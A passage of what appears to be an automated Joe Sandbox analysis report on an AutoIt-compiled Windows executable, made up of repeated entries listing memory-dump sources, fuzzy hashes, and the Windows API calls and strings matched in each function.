                                                                        • Opcode Fuzzy Hash: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                                        • Instruction Fuzzy Hash: E3219632A087818AE710CF2AF9811667691FB88BD8F444135EB9D93B75CF7CE5058740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _ctrlfp
                                                                        • String ID:
                                                                        • API String ID: 697997973-0
                                                                        • Opcode ID: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                                        • Instruction ID: 1271257fd7e84b373f4dda99bf84c05605b04bf462c159c45434e55e4a85914c
                                                                        • Opcode Fuzzy Hash: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                                        • Instruction Fuzzy Hash: 9A11A825D0C64682E611DB3CA05117BE371FF9E788F644235FB8A9B6B9DE2DE4418B04
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                        • String ID:
                                                                        • API String ID: 357397906-0
                                                                        • Opcode ID: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                                        • Instruction ID: c218763981be5a8365497d1760661741ce3d0d5b1dd12c0f036c62a4d7750bd8
                                                                        • Opcode Fuzzy Hash: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                                        • Instruction Fuzzy Hash: EF21C7B6A04B41DEEB00CF78E84459C77B0F748B8CB444826EB5897B28DF78D654CB50
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Type$Register$FileLoadModuleNameUser
                                                                        • String ID:
                                                                        • API String ID: 1352324309-0
                                                                        • Opcode ID: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
                                                                        • Instruction ID: 5d21d169b681c34482e265d24bffa512be0b41bde8433b9d057f4f34821a8105
                                                                        • Opcode Fuzzy Hash: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
                                                                        • Instruction Fuzzy Hash: B0114F72B18582C2E7308F29E49436923A0FB8CB8DF544135CB8E9B665CF7CD555CB50
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$abort
                                                                        • String ID:
                                                                        • API String ID: 1447195878-0
                                                                        • Opcode ID: 93a8c6ec86c577cad6803fb95bafd4c8778ff4d5622681f9be56b0e8e8078c7b
                                                                        • Instruction ID: 2c46de84527f5868986aaea5748050051cc8a74e1da5b8f3db20b05e095baf44
                                                                        • Opcode Fuzzy Hash: 93a8c6ec86c577cad6803fb95bafd4c8778ff4d5622681f9be56b0e8e8078c7b
                                                                        • Instruction Fuzzy Hash: 2F018820B1924642FA98AF7DA51553E1251BF4C798F949538DB1EC2BF6EE2CB8008308
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CounterPerformanceQuerySleep
                                                                        • String ID:
                                                                        • API String ID: 2875609808-0
                                                                        • Opcode ID: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                                        • Instruction ID: d31507c8fb1d52467fd9847f19ccc747bff35dd063fb35832a0151def62780fe
                                                                        • Opcode Fuzzy Hash: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                                        • Instruction Fuzzy Hash: 81019E20E08FC682EA165B2DA44417AB361BF9C789F084336EA8FA1571DF2CE5968600
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                        • String ID:
                                                                        • API String ID: 3974789173-0
                                                                        • Opcode ID: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                                        • Instruction ID: bb0c30dd03bde4a51532f4a90f7837dcf2d53ff1d44067860663265c92b67f32
                                                                        • Opcode Fuzzy Hash: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                                        • Instruction Fuzzy Hash: 2AF06561A9960283FB544F65FC0476823A0BF5DF8DF984035CA0EC2260DF3C9989C310
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 2889604237-0
                                                                        • Opcode ID: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                                        • Instruction ID: 7ee70fd277001013874e61fc48b48f263dc0e8d6e056fe155c1e86dfa5540381
                                                                        • Opcode Fuzzy Hash: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                                        • Instruction Fuzzy Hash: C1E09260A4971286FA149B6AA85C2782269BF4DFDAF404434CE0E97BB5EE7DA0499700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 2889604237-0
                                                                        • Opcode ID: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                                        • Instruction ID: 341e2e69f23763ca3455ffa06b5421b75afa6d97f26bf1d58a648eeee3df91a2
                                                                        • Opcode Fuzzy Hash: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                                        • Instruction Fuzzy Hash: E5E0B660B4975286FE14DB6AE85C2782269BF4DFDAF404034CF0E97B75EE7DA0099700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID: gfffffff
                                                                        • API String ID: 3215553584-1523873471
                                                                        • Opcode ID: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                                        • Instruction ID: 6227eac56207a5712eff1c0225d2a21474cf4bb544b30ceebb462d6ab31fe850
                                                                        • Opcode Fuzzy Hash: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                                        • Instruction Fuzzy Hash: 4F914862B0938A86EB218F2D95403BC6F95FB29BD4F048132DB8D873A5DE7DE552C301
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ContainedObject
                                                                        • String ID: AutoIt3GUI$Container
                                                                        • API String ID: 3565006973-3941886329
                                                                        • Opcode ID: e1481fd2a8d0416b882597c007a0e4bba38b356b2fac937ea6ae7002b112dc91
                                                                        • Instruction ID: d24c0c272bdb7f9999ccc467efda8fb329010334e07425eb50d90a3a959b628e
                                                                        • Opcode Fuzzy Hash: e1481fd2a8d0416b882597c007a0e4bba38b356b2fac937ea6ae7002b112dc91
                                                                        • Instruction Fuzzy Hash: 82914736604B8692DB24DF29E4402AD73A4FB88F88F518036DF8D83765EF79D899C300
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID: e+000$gfff
                                                                        • API String ID: 3215553584-3030954782
                                                                        • Opcode ID: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                                        • Instruction ID: 1a4abc08f81699df0ca615adce698908f42b552eda493b69368e6b9a17cdba72
                                                                        • Opcode Fuzzy Hash: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                                        • Instruction Fuzzy Hash: 9F512762B187C696E7258F39998076D6A91FB85B98F48D231C79CCBBE5CF2CD045C700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: FileModuleName_invalid_parameter_noinfo
                                                                        • String ID: C:\Users\user\Desktop\T6l6gPxwQU.exe
                                                                        • API String ID: 3307058713-2647473981
                                                                        • Opcode ID: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                                        • Instruction ID: bb7ab3ff984da2c4dd3cb936f2a018c0293c6236a64046bae0b934b8fa70fa09
                                                                        • Opcode Fuzzy Hash: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                                        • Instruction Fuzzy Hash: 9641B132A59A56C6E715DF29E9800BD67A4FF48BD8B448032EB0E87B65DF3CE481C304
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CreateDestroyMessageObjectSendStock
                                                                        • String ID: static
                                                                        • API String ID: 3467290483-2160076837
                                                                        • Opcode ID: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                        • Instruction ID: e4db5fa86e1199f5c81dde4ed5eba54724ed454adb4cbdfc4244980f0969afe8
                                                                        • Opcode Fuzzy Hash: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                        • Instruction Fuzzy Hash: 94412A325086C2C6D6709F29E4407AFB7A1FB88795F504235EBE947AA9DF3CD485CB40
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWidehtonsinet_addr
                                                                        • String ID: 255.255.255.255
                                                                        • API String ID: 2496851823-2422070025
                                                                        • Opcode ID: 2620319c3ff5b6f33e90d7d8a3306f43cafe9a98b61cebff61261b881329dcf7
                                                                        • Instruction ID: fbb4f47ab287059fcb538a1b04e2093f5c9d7808c0d0af30827788cf49613d08
                                                                        • Opcode Fuzzy Hash: 2620319c3ff5b6f33e90d7d8a3306f43cafe9a98b61cebff61261b881329dcf7
                                                                        • Instruction Fuzzy Hash: 2031AE32A1864281EB20DB2AE86427DB760FB5CB9CF058532DF5E833A1DE3DE546C700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _snwprintf
                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                        • API String ID: 3988819677-2584243854
                                                                        • Opcode ID: 7f6e43a92c0acba8555e010e69358058dd97d89251a2d077eb91c839043e6aa2
                                                                        • Instruction ID: 5575c5ab925ff3a35df4e241f7ac070d1de41a0d6fa3ad61883f6474e62837a5
                                                                        • Opcode Fuzzy Hash: 7f6e43a92c0acba8555e010e69358058dd97d89251a2d077eb91c839043e6aa2
                                                                        • Instruction Fuzzy Hash: 43316A76B08B4299EB24DB69E4951EC3765FB59788F504032DB0E97B6ACF38E40AC340
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CreateMessageObjectSendStock
                                                                        • String ID: $SysTabControl32
                                                                        • API String ID: 2080134422-3143400907
                                                                        • Opcode ID: 4b08ff91003b18836ab118b9c601df15ff86c0835b21660893d535a527a01a93
                                                                        • Instruction ID: 66e378f6cdeb07995d51e039e8e0e87c5fc4a699afed21fca9852f555142e3c0
                                                                        • Opcode Fuzzy Hash: 4b08ff91003b18836ab118b9c601df15ff86c0835b21660893d535a527a01a93
                                                                        • Instruction Fuzzy Hash: A73139325087C18AE760CF29E44479AB7A0F788BA4F145335EBA957AE8CF38D495CF40
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: FileHandleType
                                                                        • String ID: @
                                                                        • API String ID: 3000768030-2766056989
                                                                        • Opcode ID: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                                        • Instruction ID: 114cf4faf4cafdeb9ca01278c7dc5f3e2c16ae2c2ebbbc5ad06bfb673ba05067
                                                                        • Opcode Fuzzy Hash: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                                        • Instruction Fuzzy Hash: AF21B162A08B4281EB648B2DD4905396650FB8DB78F281339D7AF877F4DE7DE881D305
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                        • String ID: static
                                                                        • API String ID: 1983116058-2160076837
                                                                        • Opcode ID: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                                        • Instruction ID: 7ddc3df7cf2f38d67971dba35a742e74048cbefbdf2f6a1db49794cd0536b3da
                                                                        • Opcode Fuzzy Hash: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                                        • Instruction Fuzzy Hash: 9B310D36A18785CBD764CF29E444B5AB7A5F788790F104239DB9943BA8DF38E855CF00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                        • String ID: Combobox
                                                                        • API String ID: 1025951953-2096851135
                                                                        • Opcode ID: 2751fdadd79cc3ffc02769d349f49088ee270364174e6e284d45ea2163805565
                                                                        • Instruction ID: 612c1c4da0f652ee788157ae9fe316a325e4afbfa4118dacb6475bd0d1ffbac8
